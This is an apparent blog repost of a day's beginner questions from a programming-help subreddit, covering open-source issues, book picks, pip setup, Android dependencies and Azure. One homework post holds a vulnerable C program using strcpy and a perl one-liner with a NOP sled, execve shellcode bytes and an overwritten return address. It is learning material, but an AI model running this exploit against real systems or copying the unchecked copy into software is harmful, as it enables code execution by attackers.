• Breaking News

    Saturday, August 18, 2018

    It feels so good when you've been working a problem for hours and you finally figure it out. learn programming

    It feels so good when you've been working a problem for hours and you finally figure it out. learn programming


    It feels so good when you've been working a problem for hours and you finally figure it out.

    Posted: 18 Aug 2018 01:19 PM PDT

    That feeling is worth all the trouble it follows.

    submitted by /u/abbadon420
    [link] [comments]

    Does a beginner want to take care of my 2 small issues on a small open source project?

    Posted: 18 Aug 2018 07:47 AM PDT

    Hey all!

    I have a small JavaScript (Vue and Express) project on GitHub. It's a website where you enter a book title, and it calculates how long it takes you to read it (via Google Books API).

    I don't want to take advantage of one of you to close my issues (they are very simple tasks). But I think it could be an easy entry for someone who always wanted to start with Open Source (try to set up the project and find your way in the files). I wrote a few words in the issues, but I deliberately didn't write any direct solutions (:

    Therefore, if anyone is interested at all, it would be good if no "veteran" would take care of this, but someone who doesn't have so much experience.

    What you need to start is some experience with javascript (npm, node) and a free Google Books API-Key.

    Website: http://years-to-read.com/

    GitHub: https://github.com/devfake/years-to-read

    Issues: https://github.com/devfake/years-to-read/issues

    If this is the wrong sub for this, please tell me.

    Edit

    Fheww...that blows a bit more up than I thought :D Sorry for everyone who would have liked to contribute. But i can only accept one pull request for the issues. If you find something other to improve/change, issues and pull requests are welcome! I'm currently thinking about some other features for this small project (:

    Edit2

    Seems like my Google Books API volume is exhausted. Thanks guys! :D This would be also a good issue, to catch this and display a message or something. Will create a new issue for this.

    API is available again (:

    Edit3

    Created a new issue: https://github.com/devfake/years-to-read/issues/6

    submitted by /u/devfake
    [link] [comments]

    Can someone recommend a book on low-level arch/programming?

    Posted: 18 Aug 2018 06:26 PM PDT

    Hello,

    I would like to learn more about the components of a computer and their role when it comes to code execution and software in general.

    In short, I would like to learn about L1/L2 caches, processor pipelines, learn how memory pages work in details and other low-level topics they don't usually teach you in college from a software perspective beyond the "this stuff does that" schematics.

    I realised my knowledge of this is very limited (if not non-existent) when I tried to understand how Spectre-class exploits work in deep.

    But the problem is I am really unsure where to start.

    Should I pick a Computer architecture textbook? An OS textbook first?

    Which books would you recommend and in which order for a C/Python/Golang developer like me?

    Thank you very much

    submitted by /u/CeVieuxBill
    [link] [comments]

    Help finding a school

    Posted: 18 Aug 2018 09:27 PM PDT

    In the fall I will receive my associates for CS from my very small community college. Any recommendations for an employer sought school for my bachelors? Or one that you felt did the best at preparing you for the "real world"? Looking in Southern California or upstate NY for schools to apply to. Thank you in advance!

    submitted by /u/chippett
    [link] [comments]

    Side projects to work on?

    Posted: 18 Aug 2018 08:50 PM PDT

    Hello everyone! Hope you are all having a good day. I am a university student studying computer science and I am looking for side projects to work on. I have taken the intro programming classes at my school and I know my data structures but not my algorithms. I primarily program in Java.

    So far, the only side projects I have completed are ones using HTML and CSS. I am looking to work on some more complicated ones, hopefully one that will help me land an internship for next summer. Could anyone give me some suggestions on what to work on? I am open to virtually anything (hopefully challenging but not too challenging that I wouldn't be able to complete it). Thank you very much.

    submitted by /u/puddinglovah
    [link] [comments]

    At what point can you start making money by programming?

    Posted: 18 Aug 2018 06:21 PM PDT

    Hi all, so silly question vague too but i was wondering at which point is one able to do small jobs with profit (even small one).

    And let's give an example with python as its very popular. Other popular languages would make for great discussion too.

    submitted by /u/K-ali
    [link] [comments]

    Career choice

    Posted: 18 Aug 2018 06:11 PM PDT

    So I'm currently taking a break from my self studies because I came across a study that says employment for programming is expected to decline by 8 percent by the year 2024. Due to the fact that companies are realizing programming can be done anywhere in the world and that they can hire programmers in countries that wage is lower. So my question is there any point of even learning to program?

    submitted by /u/ericlp4321
    [link] [comments]

    Resource for good Java problems?

    Posted: 18 Aug 2018 08:16 PM PDT

    Can anyone suggest resource for good Java problems with solutions?

    submitted by /u/geek_007
    [link] [comments]

    Having a Hard time setting up scheme on my laptop

    Posted: 18 Aug 2018 11:40 PM PDT

    Hi everyone.

    I just started reading "Structure and Interpretation of Computer Programs" book with this video course. I installed mit-scheme with no problem, but as the video course mentions, I need STK too, which I'n unable to install it. I have a manjaro installation on my laptop and I tried making the source package which is for 32bit architecture, but failed.

    I'm stuck now, scheme looks alien to me and I don't know how to make the STK work on my laptop. I appreciate any help or tip...

    submitted by /u/nnilad
    [link] [comments]

    help understanding Angularfirebase2 snapshotchanges

    Posted: 18 Aug 2018 11:34 PM PDT

    Hey everyone so I am trying to understand a block of code found in a tutorial. Specifically that last line i'm trying to unpack. So what I understand.

    The pipe function allows us to make additional calls on async functions (observables in my case). The map function allows us to change what is returned by the snapshotchanges() function before it is applied to the this.posts . The arrow is just defining a function to be called on all changes, actions being the input parameters. The second map function not sure. a being the new input. Data is the data returned cast as a Post and id is just the id and this is all then returned as an array.

    So can someone make sure my explanation is correct and explain why a second map function is being used?

    postsCol: AngularFirestoreCollection<Post>; posts: any; postDoc: AngularFirestoreDocument<Post>; singlePost: Observable<Post>; title: string; content: string; titleSearch: string; constructor(private afs: AngularFirestore) { } ngOnInit() { this.postsCol = this.afs.collection('posts'); // This Next Line this.posts = this.postsCol.snapshotChanges().pipe( map(actions => actions.map(a => { const data = a.payload.doc.data() as Post; const id = a.payload.doc.id; return {id, data}; })) ); } 

    Original tutorial: (has some error so mine will differ)

    r/https://coursetro.com/posts/code/94/Use-Angular-with-Google's-Cloud-Firestore---Tutorial

    submitted by /u/Jonny_Drop
    [link] [comments]

    Since I had some experience creating Android apps with react-native, should I continue making apps using it, or learning from 0 with Java?

    Posted: 18 Aug 2018 11:06 PM PDT

    On the past I joined some android apps competition, I got top 10 on that national competition. But that app was just a prototype and has messy code, because previously I have 0 experience with developing android apps.

    Since at that time I only have 1 month to create the application, I figured that both learning Java and Android Development will take a long time. Since I able to use JavaScript already, I use react-native instead.

    react-native is quite nice. I am able to get shit done quickly, everyone happy.

    Now I'm thinking about developing android apps for hobby. I don't know whether I should learn from 0 with Java, or continuing using react-native since I already able to create apps using javascript.

    I think using react-native would be better because I can go straight learning android development instead of learning java from beginning. Also I heard that react-native apps could be exported to iOS apps, also I think developing in react-native is easier.

    But I am still a beginner, though. What is your opinion on this?

    submitted by /u/mayor123asdf
    [link] [comments]

    The fundamental problem with school / online course / book

    Posted: 18 Aug 2018 11:03 PM PDT

    I noticed a problem with learning technical things from a school setting, online courses or books. Most of them have this need to fill up the time slot or page count, such as most classes are 30+ hours long, most books are 300+ pages long. And the result is that the contents are usually not getting to the point, if they do get to the point, they wouldn't be able to make up the 30 hours or 300 pages.

    Do you guys find this to be a problem?

    submitted by /u/letstryusingreddit
    [link] [comments]

    It is necessary to Learn many language or just only one language is enough to become a good programmer ?

    Posted: 18 Aug 2018 10:15 PM PDT

    Please Give your point of view that the one programming language is enough to survive in the current it market or need to learn more than one language ?

    submitted by /u/Chandar_bhushan
    [link] [comments]

    any mechanical engineers who completed coding bootcamps? If so, how was it? What job do you do now?

    Posted: 18 Aug 2018 04:04 PM PDT

    for mechanical engineers, are there people who currently completed coding bootcamps? If so, what online bootcamps are worth getting into? And is there a chance for MEs to complete coding bootcamps and apply for jobs at amazon, microsoft,etc.?

    submitted by /u/mbathrowaway1234567
    [link] [comments]

    Help with Ajax and Pathing

    Posted: 18 Aug 2018 09:27 PM PDT

    Currently, I believe that I am a few steps away from launching my first webserver, but there are still a few bumps.

    First, everything works fine except for ajax.html. Now the file itself I believe is fine, but the problem is trigger_camera.py. Whenever I try to click the button "Run Script," I get hit with a 404 error message. I believe this may be due to bad routing or no routing in my "routes.py" file. Maybe it has something to do with my tree. Can anyone diagnose my problem?

    Link to GitHub:https://github.com/asdfghj1332/Webserver-v1

    submitted by /u/DAWG420BLAZEIT
    [link] [comments]

    How can you create a form that changes HTML elements permanently without the use of a database?

    Posted: 18 Aug 2018 05:01 PM PDT

    For instance, if I created a dashboard of some sort that allowed a user to permanently change the about section on their page. Is there a way to do this without a database? I can't imagine there would be, but I figured I'd ask.

    submitted by /u/moonsout_goonsout
    [link] [comments]

    Good resource for C++ problems with solutions

    Posted: 18 Aug 2018 08:17 PM PDT

    Can anyone suggest resource for good C++ problems with solutions?

    submitted by /u/geek_007
    [link] [comments]

    Can anyone please help me sort out my Python 2.7 - 3.7.x issues on macOS?

    Posted: 18 Aug 2018 04:14 PM PDT

    I know that Apple ships macOS with Python pre-installed. Several months back, when I first started learning to code, I went through some YouTube tutorials that explained it to me, but I was so new to all of these concepts, I did not fully comprehend everything I was doing; I just kind of followed along.

    Now, I am trying to go back, wipe the slate clean, and start over... oping that the experience of uninstalling everything and re-installing it all, will help solidify some of these brand new concepts for me. So, I uninstalled PyCharm, simply by opening Finder > Applications > and dragging the PyCharm.app application to the Trash. Easy!

    Python was more of a problem, because there isn't a neat and clean little 'uninstall' feature. I thought I could simply find out where Python the python-3.6.0-macosx10.9.pkg package file, that I downloaded from https://www.python.org/ , physically installs Python on my Mac. Then I'd just drag that directory to the Trash, the same way I did PyCharm.

    In full disclosure, I do not remember every single step that I took along the way, but I managed to screw things up somehow. Before I ever installed Python 3, I could at least open a Terminal window and type python --version, and it would show me that I had Python 2.7 installed. Then after I installed Python 3.6, I had to type in python3 --version, specifying Python 3, not the Python 2 that was pre-installed. It would display that I was on version 3.6.

    Then one of the YouTube tutorials walked me through writing some command in Terminal that would set the new Python 3 as the default Python version, so i would no longer have to type in python3; just python into Terminal. Well, after I drug the Python 3.6 file to the Trash, (the uninstall), and then ran the python-3.7.0-macosx10.9.pkg file, (the re-install,) I thought all would go back to the way it was, and since this was Python 3.7 instead of 3.6, I had upgraded the version as a result of all this. However... after I reinstalled PyCharm, none of my existing files could run. They all had no interpreter associated with them. I tried to run the same Terminal command python --version, python3 --version, python2 --version... they all came back with something like invalid command no file or directory exists.

    For a solid week, I tried to put things back together. I ended up trying to uninstall/reinstall everything 2-3 more times. I ended up figuring out the PyCharm interpreter issue. I was also able to get Python 3.7 installed again. And now... if I open Terminal and type python -- version... it says: Python 3.7.0. So, I think I am fine.

    I can create new Projects in PyCharm, and run them fine. I can open and run older projects from before the chaos fine. Everything seems to be okay.

    BUT...

    If I open a Terminal window and type in the following command: pip --version, it returns this:

    pip 18.0 from /Library/Python/2.7/site-packages/pip-18.0-py2.7.egg/pip (python 2.7). As soon as I saw the Python/2.7 part, I got a little concerned. So I tried to run this, just as a test: python -m pip --version, and it returned this:

    pip 10.0.1 from /Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/pip (python 3.7). I only found this issue (if it even is an issue), because one of the tutorial I am working on said to make sure you are using the most recent version of pip. To me, it looks like I have two versions of pip, and I do not know how to make the newest version my default pip version. Right now, it seems like pip --version, returns the newest version of pip, but it is connected to Python 2.7, where as Python 3.7 is connected to pip 10, and old version of pip.

    If some brave and kind soul could help me, I'd be very thankful. And please, do not assume that I actually know anything about pip, package manager, packages, or paths. Because I really do not. I am an "end user" who has very recently decided to learn coding.

    submitted by /u/Dolmetscher007
    [link] [comments]

    [Android Dev/Android Studio] What do I do if a github library I want to use has not been updated in a year?

    Posted: 18 Aug 2018 04:14 PM PDT

    I am a beginner android developer looking for help on how to build a persistent search view. I found this github library and thought it would be a good idea.

    I followed the usage instructions but adding the dependency keeps giving me an error when I sync the gradle.

    compile 'com.github.arimorty:floatingsearchview:2.1.1' 

    This is the error I keep on getting.

    All com.android.support libraries must use the exact same version specification (mixing versions can lead to runtime crashes). Found versions 27.1.1, 25.3.1. Examples include com.android.support:animated-vector-drawable:27.1.1 and com.android.support:cardview-v7:25.3.1 less... (Ctrl+F1) There are some combinations of libraries, or tools and libraries, that are incompatible, or can lead to bugs. One such incompatibility is compiling with a version of the Android support libraries that is not the latest version (or in particular, a version lower than your targetSdkVersion).

    Any help for a beginner android developer, please? Thank you!

    submitted by /u/godsofdeathloveapple
    [link] [comments]

    Trying to Learn C# in Unity

    Posted: 18 Aug 2018 07:28 PM PDT

    Hello everyone, Things need to be known

    - I do not know any other programming language

    - Have no Experience with any game engines

    I've been trying to learn how to make games with Unity using C# but when watching a tutorial I just copy what's on the screen and I never remember anything, only little bits and pieces am I learning wrong? I've always wanted to make my own games and stuff. Is this what everyone goes through and if yes, how long did it take you to remember all the things.

    Sorry for the bad grammar. :P

    submitted by /u/DanielRocky
    [link] [comments]

    What subjects should I learn before studying back-end dev with Python?

    Posted: 18 Aug 2018 07:21 PM PDT

    I found a book that deals with some issues that seem important, but others do not, and I am in doubt whether I should read the entire book or not, because I want to learn what is necessary only to get to the study of back-end development.

    the chapters of the book (Foundations of Python Network Programming) are:

    1 - Introduction to Client-Server Networking

    2 - UDP

    3 - TCP

    4 - Socket names and DNS

    5 - Network Data and Network Errors

    6 - TSL/SSL

    7 - Server Architecture

    8 - Caches and Message Queues

    9 - HTTP Clients

    10 - HTTP Servers

    11 - The World Wide Web

    12 - Building and Parsing E-Mail

    13 - SMTP

    14 - POP

    15 - IMAP

    16 - Telnet and SSH

    17 - FTP

    18 - RPC

    Should I read everyone? Do I need to read anything else outside the scope of this book?

    My goal is to work with Flask / Django and create websites and api's.

    I also have knowledge in HTML and CSS, just javascript that I studied only 100 pages of a book.

    I also have no knowledge in python decorators, which is needed mainly for flask and for pytest, but this subject I will learn in some articles and doc.

    books I've already studied:

    1 - python crash course

    2 - learning web design 5ed

    3 - postgresql - tutorialspoint

    4 - 200 pages of javascript novice to ninja (javascript is horrible)

    I also have the book Fluent Python - Luciano Ramalho

    submitted by /u/marcosdeveloper
    [link] [comments]

    How to implement get and set functions c++

    Posted: 18 Aug 2018 07:21 PM PDT

    I created my class and I want to use get and set in something like:

    Client[i]->set_a=Something

    And I want "a" to have different values stored. My problems that I don't remember how to implement this part exactly.

    submitted by /u/MxCherryBlue
    [link] [comments]

    Buffer Overflows - counting Bytes, need quick help!

    Posted: 18 Aug 2018 11:38 AM PDT

    #include <unistd.h> int main(int argc, char *argv[]) { char buff[100]; if(argc < 2) { printf("Syntax: %s <input string>\n", argv[0]); exit (0); } strcpy(buff, argv[1]); return 0; } 

    ./test `perl -e 'print "\x90"x60 . "\x99\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "A"x28 . "\x30\xf5\xff\xbf"'`

    In my homework solution it said I need to do 60*NOP, 24B Shellcode, 28*A, 4Byte address to shellcode to run this BufferOverflow.

    So total 116 Bytes that need to be replaced

    Although Im counting the bytes now and got:

    4 return address 4 old ebp 100 buff 

    Here I get only 108 bytes, where are the other 8 bytes I am missing?

    submitted by /u/itmiko
    [link] [comments]

    Explain to me like I'm 5: Why ever pick microsoft azure and cosmos DB and whatever else is going on. It's so confusing.

    Posted: 18 Aug 2018 06:59 PM PDT

    I don't get why I should host my database and application on azure.

    I don't understand why I want cosmos DB over the other azure sql server db. I don't get any of this.

    I am used to oracle DB, maven and linux VMs. This is all confusing.

    Especially when I add in using VSTS over Jira. VSTS to me atm seems like a worse Jira in every way, yet some people supposedly say it's good.

    I don't see how and want people to tell me why exactly this is a better ticket management system? People say a lot about "Ecosystem ecosystem" and I don't get it. How?

    Like I understand "requirements" vary but being serious I don't understand the difference between these options. Why would I ever want to do one over another? It's just so wishy washy and not concrete to me atm. Hoping someone can solidify reasoning :x

    submitted by /u/confusedGuy17
    [link] [comments]

    No comments:

    Post a Comment